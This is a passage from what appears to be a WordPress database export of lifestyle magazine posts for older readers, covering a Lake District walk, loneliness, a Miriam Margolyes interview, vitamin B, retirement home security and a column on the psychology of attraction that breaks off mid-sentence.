href=\"http://www.drloriboul.com/\" target=\"_blank\"><img class=\"alignright  wp-image-2835\" title=\"Dr Lori Boul\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/08/Dr-Lori-Boul1.jpg\" alt=\"\" width=\"130\" height=\"178\" />Dr. Lori Boul</a></strong></em> gained her PhD at the University of Sheffield in the UK and the research for her thesis, into ‘male menopause’, attracted worldwide media attention. Dr Lori is probably one of the most outspoken speakers on the topic of human sexuality and in writing her book <em><strong><a href=\"http://www.howtobooks.co.uk/display.asp?K=9781845284749&amp;sf_01=CAUTHOR&amp;sort=SORT_TITLE&amp;st_02=diy+sex&amp;sf_02=CTITLE&amp;sf_03=KEYWORD&amp;sf_04=identifier&amp;m=1&amp;dc=1\" target=\"_blank\">DIY Sex and Relationship Therapy</a></strong></em> has dared to challenge the need for face-to-face therapy. According to Dr Lori, “Good therapists can be hard to find and for many people a good spoonful of common sense is all that is needed”.</p>&#13;\n<p>Whether speaking to the general public or professionals, Dr Lori’s expertise, sensitivity and humour inspire new ways of thinking about relationships, sex and psychology. She has presented talks at national and international conferences, provides training courses and executive mentoring, and is featured as a regular guest speaker with Cunard.</p>&#13;\n<h5><a href=\"http://www.drloriboul.com/\" target=\"_blank\"> www.drloriboul.com</a> <div class=\"woo-sc-hr\"></div></h5>&#13;\n									</div>','Getting to Know You','Psychology Of Love - Part 5 We don’t like to believe that physical attractiveness accounts for much in life, particularly since we can’t do much about it. Many','publish','open','open','','getting-to-know-you','','','2018-04-02 20:04:45','2018-04-02 20:04:45','',0,'http://westonspirit.org.uk/getting-to-know-you.asp',0,'post','',0),(233,1,'2015-03-24 02:48:17','2015-03-24 02:48:17','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Into the wild\" st_url=\"http://westonspirit.org.uk/2012/08/into-the-wild-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Into the wild\" st_url=\"http://westonspirit.org.uk/2012/08/into-the-wild-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Into the wild\" st_url=\"http://westonspirit.org.uk/2012/08/into-the-wild-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Into the wild\" st_url=\"http://westonspirit.org.uk/2012/08/into-the-wild-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Into the wild\" st_url=\"http://westonspirit.org.uk/2012/08/into-the-wild-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Enjoy the final throes of summer with a breathtaking walk in the Lake Districts </h4>&#13;\n<p><img width=\"596\" height=\"491\" src=\"/wp-content/uploads/2012/08/Walking-map-596x491.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<ul><li>The walk starts in the National Trust car park in Great Wood. This can be reached from the B5289 Keswick to Borrowdale Road about 2km south of Keswick. After parking, locate the southern pedestrian exit. This path leads toward a bridge over Car Gill.</li>&#13;\n<li>Go over the bridge and continue ahead. This path descends to reach Ashness Bridge. Enjoy the view, then go back on yourself to the wall and take the right-hand path.</li>&#13;\n<li>This path leads uphill with a couple of short sections – you might need to use hands. Eventually the grade eases and ahead you will see the top of Walla Crag, located on the other side of the stone wall.</li>&#13;\n<li>Continue along the path for a short way before crossing the wall into open country. The onward route continues north with the wall to your left on an easy-to-follow path.</li>&#13;\n<li>The path reaches a lane at Rakefoot. Go down the lane for a short way and you will come to a half-hidden path on your left.</li>&#13;\n<li>Follow the path down to the bridge over the beck and downhill towards Keswick.</li>&#13;\n<li>At the first junction, turn left on to a path signed to “Great Wood”. Entering woodland, keep left to join a forest track.</li>&#13;\n<li>This leads downhill under Walla Crag, continue and reach the Great Wood car park.</li>&#13;\n</ul></div>','Into the wild','Enjoy the final throes of summer with a breathtaking walk in the Lake Districts The walk starts in the National Trust car park in Great Wood. This can be','publish','open','open','','into-the-wild','','','2018-04-02 20:04:44','2018-04-02 20:04:44','',0,'http://westonspirit.org.uk/into-the-wild.asp',0,'post','',0),(235,1,'2014-08-03 19:11:02','2014-08-03 19:11:02','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"It’s good to talk\" st_url=\"http://westonspirit.org.uk/2012/08/its-good-to-talk-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"It’s good to talk\" st_url=\"http://westonspirit.org.uk/2012/08/its-good-to-talk-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"It’s good to talk\" st_url=\"http://westonspirit.org.uk/2012/08/its-good-to-talk-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"It’s good to talk\" st_url=\"http://westonspirit.org.uk/2012/08/its-good-to-talk-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"It’s good to talk\" st_url=\"http://westonspirit.org.uk/2012/08/its-good-to-talk-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>The health risks associated with being alone, such as depression and Alzheimer’s, are serious and must be tackled head-on</h4>&#13;\n<p><img width=\"596\" height=\"397\" src=\"/wp-content/uploads/2012/08/Copy-of-laura-big_GW50902.jpg\" style=\"float:left; margin-right:15px\" /></p><p class=\"para para_consumer%3aconsumer_body_drop_cap\">Loneliness is bad for your health. Researchers from across 150   separate studies have shown that loneliness is as good an indicator of early mortality as lifelong smoking or obesity.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">An extensive study by academics in the US has shown a link between loneliness and Alzheimer’s disease – the risk of developing Alzheimer’s can be up to twice as high if you are lonely – and there are also clear links in numerous studies with depression, and even heart disease.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">With so much negative impact on our health, something must be done about loneliness. Ideally, it must be prevented before it even begins.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">The Campaign to End Loneliness is a coalition of organisations and individuals working to combat loneliness and inspire individuals to keep connected in older age. It is led by five organisations: Age UK Oxfordshire, Independent Age, Manchester City Council, Sense and WRVS.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">With nearly 50 per cent of older people feeling sometimes or always lonely, we need to start with those things that trigger and lead to loneliness: personal and factors in wider society.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">Loneliness is much harder to shake off in older age for a number of reasons. It might be more difficult to get out and about because our mobility reduces or because we can no longer drive. Personal changes, such as moving house, bereavement, hearing loss or poor health can also lead to loneliness.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">Society, too, places restrictions on people’s ability to get out and about with rising costs of travel or even in the way local town centres are designed which can prevent people from coming together. If we start with these ‘triggers’, we can work back to combat loneliness.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">We have started with Loneliness Harms Health, a community level initiative to ensure that the health impacts of loneliness are understood better by those making decisions about our health system and spending. It has started in Essex and Cornwall and will go national in October.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">We have also been working to support health and care officials to better understand the health implications of loneliness, and what can be done to prevent it. Funded by the Department of Health, in July we launched a ‘toolkit’ to help assess the need in an area and set out strategic methods of tackling loneliness.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">There are a number of ways to help prevent and alleviate loneliness in older age. You can become a supporter of the campaign and express an interest in starting a Loneliness Harms Health campaign in October.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\">If you want to act now, you can contact your local council and let them know you care about the issue of loneliness in older age, and champion our toolkit. Or you could volunteer with one of the many organisations we work with.</p>&#13;\n<p class=\"para para_consumer%3aBody_copy\"></p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_footer\">For more information on how to prevent loneliness, visit www.campaigntoend?loneliness.org.uk ?</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_footer\"></p>&#13;\n									</div>','It’s good to talk','The health risks associated with being alone, such as depression and Alzheimer’s, are serious and must be tackled head-onLoneliness is bad for your health.','publish','open','open','','its-good-to-talk','','','2018-04-02 20:04:42','2018-04-02 20:04:42','',0,'http://westonspirit.org.uk/its-good-to-talk.asp',0,'post','',0),(236,1,'2016-04-12 19:04:30','2016-04-12 19:04:30','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"“I’ve always been naughty – making people laugh is a very powerful ?thing to do”\" st_url=\"http://westonspirit.org.uk/2012/08/ive-always-been-naughty-making-people-laugh-is-a-very-powerful-%e2%80%a8thing-to-do-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"“I’ve always been naughty – making people laugh is a very powerful ?thing to do”\" st_url=\"http://westonspirit.org.uk/2012/08/ive-always-been-naughty-making-people-laugh-is-a-very-powerful-%e2%80%a8thing-to-do-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"“I’ve always been naughty – making people laugh is a very powerful ?thing to do”\" st_url=\"http://westonspirit.org.uk/2012/08/ive-always-been-naughty-making-people-laugh-is-a-very-powerful-%e2%80%a8thing-to-do-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"“I’ve always been naughty – making people laugh is a very powerful ?thing to do”\" st_url=\"http://westonspirit.org.uk/2012/08/ive-always-been-naughty-making-people-laugh-is-a-very-powerful-%e2%80%a8thing-to-do-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"“I’ve always been naughty – making people laugh is a very powerful ?thing to do”\" st_url=\"http://westonspirit.org.uk/2012/08/ive-always-been-naughty-making-people-laugh-is-a-very-powerful-%e2%80%a8thing-to-do-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Miriam Margolyes talks to Maureen Paton about her hunger for success, swimming to stay fit, and her hopes of growing old disgracefully</h4>&#13;\n<p><img width=\"300\" height=\"431\" src=\"/wp-content/uploads/2012/08/Copy-of-Miriam-Margolyes-Red-Shirt.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">After two outrageous recent appearances on the Graham Norton Show, she has become a YouTube hit at the age of 71. In an astonishingly productive 50-year career, she has worked with everyone from Barbra Streisand (twice) and Leonardo di Caprio to Martin Scorsese.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">For millions of child fans, she’s immortalised as Harry Potter’s eccentric Professor Pomona Sprout; and now, she has hit the road with a marathon UK and world tour of her critically acclaimed one-woman show, Dickens’ Women, to mark the bicentennial of Dickens’ birth. All this has brought her several homes around the world and a jet-setting lifestyle. So where did it all go right for Miriam Margolyes?</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">To hear the actress talk wistfully of still-unfulfilled ambitions, you’d think she’d only just started out in showbusiness, instead of making her debut in 1962 as the only girl alongside the future Monty Python stars John Cleese and Graham Chapman in the Cambridge Footlights.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">“I’m extremely hungry for more success. I want to be invited to the National Theatre and the RSC and do some serious roles in the West End,” says Miriam, spurred on by the feeling that time may be running out. “I think I have got a long way to go and I probably have six or seven years of active professional life if I’m lucky. But I utterly adore performing, it’s my life’s pleasure.”</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">When, at 51, she first met Michelle Pfeiffer on the set of Scorsese’s The Age of Innocence, Miriam famously broke the ice (and provoked a fit of Hollywood giggles) by greeting the slender Pfeiffer with, “Hello, fatty.” Maturity has certainly brought more social confidence to Miriam, once a self-styled “frightened little muffin”, even if it hasn’t yet cured her stage fright.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">“But those pre-show nerves are a good sign,” she points out, “it means the adrenaline is flowing.” And four years ago, she felt relaxed enough at 67 to come out publicly as gay on Desert Island Discs. “I am what I am, I’m very happy with myself,” says Miriam, whose partner is a retired Australian academic that she prefers not to name in interviews.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">And despite yearning for more serious roles in the classic tradition of the comedian who longs to play Hamlet, the passing years have brought her more status, too.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">“After years of being seen as just a funny little character actress, suddenly I seem to have transmogrified into a rather important older actress, which comes back to longevity – because if you’ve been around long enough, people think you’re wonderful,” says Miriam, who received an OBE for services ?to drama in 2001.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">Yet she’s well aware of the dangers of overwork and too little exercise. “I’ve always been very frightened of strokes because my mother had one and it’s the most terrible way to end your life,” she says. A keen swimmer, she regularly does 40 lengths of the nearest pool, even on tour.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">“When you get to over 70, you have to take care of yourself,” adds Miriam, who considers herself “pretty fit despite being overweight”.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">Meanwhile, the offers keep coming in on both sides of the Atlantic. Her first Graham Norton appearance last year was spotted by the director of Barbra Streisand’s forthcoming film The Guilt Trip, Anne Fletcher, which led to Miriam working with the great diva again for the first time since Yentl nearly 30 years ago. And no, she didn’t greet Streisand as Fatty; there is a limit to even Miriam’s lack of inhibition. “Barbra is very friendly and professional but she knows she has to protect herself in a perfectly polite way against exhaustion and people interfering, so you are not expected to have major confidences with her.”</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">Back in the UK earlier this year, she filmed the role of a haughty grandmother alongside Dame Harriet Walter and Robert Webb in the new British rom-com The Wedding Video, even though Miriam doesn’t consider herself “granny material.” Instead, her main passion – apart from Dickens – is her computer. As one of the first wave of pioneering silver surfers 20 years ago, she now counts genealogy as her favourite hobby after online discoveries of “lots of cousins in Israel, South Africa and America”.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">All that clearly helps to keep her young at heart. Yet she’s very comfortable with being 71 and even looks forward to living in a retirement home one day. “I love the idea of retirement villages,” she declares impulsively. “I’ve always preferred the company of people over 70 anyway: one of the first things that attracted me to my partner was that she had prematurely white hair!”</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">Although the couple of 43 years don’t feel the need for a civil partnership or marriage, Miriam is prudent enough to be considering plans for a living will.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">“I think it’s important when you’re not married, because staff in hospitals can be funny about letting your partner make decisions for you,” she says.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\">So she seems to have everything sorted. One imagines that any retirement home with Miriam in it is going to be such enormous fun that we’ll all be queuing up to get in. “I have always been naughty; my comedy is potty-mouthed,” she says. “So I’m going to grow old disgracefully – I hope.”</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\"> </p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_footer\">Dickens’ Women is on tour in the UK until 13 October</p>&#13;\n									</div>','“I’ve always been naughty – making people laugh is a very powerful ?thing to do”','Miriam Margolyes talks to Maureen Paton about her hunger for success, swimming to stay fit, and her hopes of growing old disgracefully After two outrageous','publish','open','open','','ive-always-been-naughty-making-people-laugh-is-a-very-powerful-thing-to-do','','','2018-04-02 20:04:41','2018-04-02 20:04:41','',0,'http://westonspirit.org.uk/ive-always-been-naughty-making-people-laugh-is-a-very-powerful-thing-to-do.asp',0,'post','',0),(237,1,'2016-04-10 00:16:45','2016-04-10 00:16:45','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Lacking energy? Get a vitamin B boost\" st_url=\"http://westonspirit.org.uk/2012/08/lacking-energy-get-a-vitamin-b-boost/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Lacking energy? Get a vitamin B boost\" st_url=\"http://westonspirit.org.uk/2012/08/lacking-energy-get-a-vitamin-b-boost/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Lacking energy? Get a vitamin B boost\" st_url=\"http://westonspirit.org.uk/2012/08/lacking-energy-get-a-vitamin-b-boost/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Lacking energy? Get a vitamin B boost\" st_url=\"http://westonspirit.org.uk/2012/08/lacking-energy-get-a-vitamin-b-boost/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Lacking energy? Get a vitamin B boost\" st_url=\"http://westonspirit.org.uk/2012/08/lacking-energy-get-a-vitamin-b-boost/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Aid stamina and fight off fatigue by eating more dairy, meat and fish</h4>&#13;\n<p><img width=\"300\" height=\"450\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/08/Copy-of-oats-147308144.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">With so many exciting sporting events this summer, more and more of us may be getting inspired to increase our own activity levels. For those looking for ways to support their energy levels and stamina, a healthy balanced diet is an important ?first step but a vitamin B supplement could also offer a helping hand.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">There are several types of B vitamins that help support different aspects of your health. These include B1 (thiamin), B2 (riboflavin), B3 (niacin), B5 (pantothenic acid), B6 (pyridoxine), B12, folic acid and biotin. Dairy products, meat, fish, nuts and wholegrain cereals such as oats and brown rice are good sources of a range of B vitamins.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Vitamin B, also known as the ‘energy vitamin,’ plays a vital role in helping the body efficiently use the energy contained within the foods we eat, so ensuring we get adequate amounts of vitamin B in the diet can help to stave off fatigue.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Vitamin B has many other great benefits – it contributes to the normal function of the nervous system, it can help with the maintenance of red blood cells and can help maintain normal skin.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">As we age, it is harder for our bodies to absorb vitamin B12 from food and doctors often suggest fortified foods and supplements for people over 50. There are a wide range of supplements available that contain vitamin B, including vitamin B complexes that provide several of the key B vitamins in one supplement. Other supplements that you may want to consider include iron, magnesium and vitamin C as they can also help maintain energy levels.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\"> </p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Vicky Pennington is a nutritionist with Boots. For more information on vitamins and minerals, visit www.BootsWebMD.com</p>&#13;\n									</div>','Lacking energy? Get a vitamin B boost','Aid stamina and fight off fatigue by eating more dairy, meat and fish With so many exciting sporting events this summer, more and more of us may be getting','publish','open','open','','lacking-energy-get-a-vitamin-b-boost','','','2018-04-02 20:04:39','2018-04-02 20:04:39','',0,'http://westonspirit.org.uk/lacking-energy-get-a-vitamin-b-boost.asp',0,'post','',0),(238,1,'2018-01-23 09:50:32','2018-01-23 09:50:32','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gnorwood\" title=\"Posts by Graham Norwood\" rel=\"author\"&gt;Graham Norwood</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Leaving your home in safe hands\" st_url=\"http://westonspirit.org.uk/2012/08/leaving-your-home-in-safe-hands-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Leaving your home in safe hands\" st_url=\"http://westonspirit.org.uk/2012/08/leaving-your-home-in-safe-hands-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Leaving your home in safe hands\" st_url=\"http://westonspirit.org.uk/2012/08/leaving-your-home-in-safe-hands-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Leaving your home in safe hands\" st_url=\"http://westonspirit.org.uk/2012/08/leaving-your-home-in-safe-hands-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Leaving your home in safe hands\" st_url=\"http://westonspirit.org.uk/2012/08/leaving-your-home-in-safe-hands-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Retirees who leave their homes for time abroad are often worried about the safety of their property – but that can be a thing of the past, thanks to a new security scheme. By Graham Norwood</h4>&#13;\n<p><img width=\"596\" height=\"410\" src=\"/wp-content/uploads/2012/08/Toulouse.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">Lock-up-and-leave – it’s a phrase often used by hard-sell estate agents, but when it comes to maximising your retirement time, it really is a useful concept.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">The term describes properties specially designed for those who can spend long chunks of time away, typically overseas at a sun-kissed holiday home during our chilly winters. </p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">The emphasis is on apartments in well-managed schemes with specific staff employed to provide security and services aimed at handling bureaucracy and maintenance – leaving owners time to enjoy themselves without worrying about the home they left behind.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">There are two main options for prospective lock-up-and-leave purchasers.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">The first is to buy into a block of apartments with a concierge. A key advantage is that these schemes can be found in a wide choice of locations. They are mainstream and not just for retirees, attracting buyers from a cross-section of ages and backgrounds, and are often in central positions close to restaurants, culture and transport hubs.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">For example central London has scores of such developments, many built to a high specification, and similar ones can now be found in smaller cities such as Bristol.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">Yet concierges do have their limits. They ensure no unwanted visitors, supervise mail-collection and cleaning in your absence and manage maintenance of the block as a whole. But they are unlikely to hold the responsibility to check on internal features such as whether your boiler has broken down or whether there is a small leak affecting your home.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">A small but increasing number of these schemes have optional extra-cost concierge facilities allowing you to have extra luxury, like having your fridge re-stocked or fresh flowers in your rooms ahead of your return from holiday. </p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">This is a nice touch but adds to the sometimes-daunting service charges typically found in concierge developments. Exact costs depend on the size of the apartment but in central London, £10,000-plus a year is not uncommon, falling to £5,000 elsewhere. But remember these costs do also include contributions to the maintenance of the building and grounds. </p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">Concierge-style security has been the ideal solution for Robert and Jennifer Spiers, two recent retirees who intend to spend six months of the year in Chelsea and the autumn and winter in the French Tarn region, about an hour east of Toulouse. </p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">“Our London flat means we’re near galleries and theatres, which are our ‘thing’. But we don’t worry about the state of the property or the prospect of burglary when across the Channel,” explains Jennifer. </p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">The alternative option is to purchase a dedicated retirement apartment or house, many of which have state-of-the-art security and high levels of property management.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">“A camera entry system is installed and an intruder alarm is fitted to the front door of every apartment. On ground level, sensors fitted throughout the apartments. Most importantly, there’s always a lodge manager, responsible for the smooth running of our developments,” explains Spencer McCarthy, managing director of Churchill Retirement Living. </p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">Bill Gair, chief executive of retirement specialists Urban Renaissance Villages, says: “Our maintenance team runs water and checks for leaks, adjusts heating if required and checks the boiler is functioning. The cleaners go in and dust, make sure post isn’t left sticking out of letterboxes. Other residents can see if unfamiliar people are hanging around.”</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">These services cost too, of course, and again this tends to be based on property size and the scale of the retirement development. Charges tend to range from £3,000 to £6,000 per year depending on the scheme – again including maintenance, especially of the large gardens and grounds typically found on many of these communities.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">One couple delighted with their retirement lock-up-and-leave are Alan and Lorna Cullens, who live at URV’s Bramshott Place Village at Liphook, Hampshire and fly on frequent holidays as well as regular cruises. “We can just lock up and go away. Bramshott enables you to make the most of your life,” says Alan. </p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">Of course, the lock-up-and-leave concept relies on your place overseas being equally secure. </p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_drop_cap\">The same rules apply – apartment schemes on managed resorts or any one of the growing number of dedicated retirement schemes in France, Spain, Portugal and North America make perfect choices to guarantee peace of mind about security when you are spending your time back home in Britain. </p>&#13;\n<p class=\"para para_consumer%3aconsumer_sidebar_body\">&#13;\n									</p></div>','Leaving your home in safe hands','Retirees who leave their homes for time abroad are often worried about the safety of their property – but that can be a thing of the past, thanks to a new','publish','open','open','','leaving-your-home-in-safe-hands','','','2018-04-02 20:04:38','2018-04-02 20:04:38','',0,'http://westonspirit.org.uk/leaving-your-home-in-safe-hands.asp',0,'post','',0),(239,1,'2015-06-04 05:03:56','2015-06-04 05:03:56','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> drloriboul\" title=\"Posts by Dr Lori Boul\" rel=\"author\"&gt;Dr Lori Boul</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Love or Lust at First Sight?\" st_url=\"http://westonspirit.org.uk/2012/08/love-or-lust-at-first-sight/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Love or Lust at First Sight?\" st_url=\"http://westonspirit.org.uk/2012/08/love-or-lust-at-first-sight/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Love or Lust at First Sight?\" st_url=\"http://westonspirit.org.uk/2012/08/love-or-lust-at-first-sight/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Love or Lust at First Sight?\" st_url=\"http://westonspirit.org.uk/2012/08/love-or-lust-at-first-sight/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Love or Lust at First Sight?\" st_url=\"http://westonspirit.org.uk/2012/08/love-or-lust-at-first-sight/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3>Psychology of Love – Part 4</h3>&#13;\n<p>Since research suggests that we decide whether or not we like a person in the first 30 seconds of meeting them, it would appear the ‘love at first sight’ notion could have some merit. However, according to evolutionary theories ‘lust at first sight’ might be more accurate.</p>&#13;\n<p>From a distance, particularly if we have poor eyesight, the first thing we might notice about a person is the shape and size of their body. The evolutionary view is that we are more likely to be attracted to people with physical attributes that will ensure successful reproduction. This means that men will be attracted to healthy women with wide childbearing hips and large breasts with which to feed their young. Whereas, women’s preferences are for mates that will be able to provide protection and food for their children; hence they look for healthy men that are physically strong who could bring home the dinosaur burgers.</p>&#13;\n<p>Since good health is associated with youth and beauty, these theories have frequently been used to provide explanations for men’s preference for younger attractive women. Yet these same theorists would have us believe that women’s preferences have changed and they are not looking for young fit men but older rich men. While this might be a good argument for finding a ‘provider’, healthy genetic material is more likely to be found in younger men. Therefore, it would appear more logical for both women and men to look for youth and beauty. So, it probably isn’t a coincidence that as women have increased their earning power, the sale of men’s beauty products and surgical enhancements, as well as gymnasium subscriptions, have also increased. While, at first glance, the proportions of a person’s body can be sufficient to pique our interest, if the face doesn’t fit then there is little chance of lust or love at first sight.</p>&#13;\n<p>Despite the old adage, ‘you don’t look at the mantelpiece when you’re poking the fire’, for both men and women, the face is very important when it comes to attraction. In most cultures, men appear to show a preference for neotenous features – a baby-type face with large forehead, big eyes, cherub lips and a wide smile – in other words, a youthful look. Whereas, women keep changing their minds – nothing new there then! At particular times of the month, when women are more fertile, they tend to prefer the craggy features of masculine faces, the rest of the time they favour faces that are more feminine. However, studies have revealed that what most people find attractive are symmetrical faces, those with evenly balanced features that are relatively free from blemishes. Again, this supports the evolutionary theories that we are looking for good ‘mating’ material. So, despite his physical strength and caring, sensitive nature, Quasimodo never really did stand a chance with Esmeralda.</p>&#13;\n<p>Providing we are sufficiently attracted to the outward appearance of a potential partner, to clinch the deal we need to get close enough to look into their eyes. When people see something they like, their pupils dilate. Although we are unlikely to be consciously aware of the change in other people’s (or our own) pupils we certainly respond to this subtle signal of attraction. In a laboratory situation, it has been found that when two strangers of the opposite sex have been asked to gaze into each other’s eyes for two minutes, they will frequently express feelings of passion. This means eyes can be a powerful weapon in nature’s armoury of ‘love’. But it could also be a case of lust being in the eye of the beholder.</p>&#13;\n<p>So we meet someone, and in 30 seconds we have decided, from the shape of their body and proportions of their face, whether or not they are good partner material. After a couple of minutes of gazing into each other’s eyes we might not be in love but we could certainly be in lust. It would appear that evolutionary theory could provide us with some explanation of what we are attracted to in our reproductive years.</p>&#13;\n<p>What about older daters? When we are past our reproductive prime our bodies are far from perfect, faces are rarely blemish free and lose their symmetry, and it is not always possible to see beyond our 